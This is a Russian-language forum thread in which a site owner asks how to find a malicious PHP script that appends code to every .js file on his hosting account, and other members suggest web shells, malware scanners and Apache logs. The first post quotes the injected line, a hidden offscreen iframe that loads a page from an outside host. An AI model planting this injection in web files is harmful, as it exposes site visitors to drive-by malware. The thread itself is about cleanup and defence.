Вредоносный php скрипт пишет свой код во все .js на хостинге

Discussion in 'PHP' started by TOP4, 24 Dec 2012.

  1. TOP4

    TOP4 Banned

    Joined:
    19 Dec 2010
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    Такая проблема. Ко мне на хостинг попал вредоносный php скрипт, возможно с бесплатными шаблонами или компонентами для joomla. На аккаунте около 30 сайтов. После этого во всех *.js, где CHMOD позволял, стали добавляться строки вида ;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://bcjnxw.ns2.name/d32905cbfd64d82415ca3c8b0b228.xan?11"></iframe>');

    Если удалить iframe и поставить chmod 444 на js файлы, то проблема отпадает. Но как удалить сам вредный скрипт? Как его найти?
     
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    какой скрипт? да тебя просто ломанули вот и фреймят всё что можно
     
  3. TOP4

    TOP4 Banned

    Joined:
    19 Dec 2010
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    Это php скрипт. Я же говорю, если на файле стоит CHMOD 444, то в него никакой вредоносный код не записывается. А значит, пишут не с ftp а по web.
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    а при чём тут фтп? редачить можно и через шелл
     
  5. TOP4

    TOP4 Banned

    Joined:
    19 Dec 2010
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    см. выше
    разницу в никсах знаешь между пользователями www и root ?
     
  6. Sladkiy

    Sladkiy New Member

    Joined:
    28 Nov 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Шелл от рута запустили, не?
     
  7. TOP4

    TOP4 Banned

    Joined:
    19 Dec 2010
    Messages:
    23
    Likes Received:
    4
    Reputations:
    1
    Не. Я же и так объяснил, что это php скрипт. Как его вычислить?
     
  8. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    grep или ItBolt как-то такт название скрипта, ищет шеллы, бэкдоры, и прочие вредоносы.
     
  9. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Не пробовал логи апача читать одмин?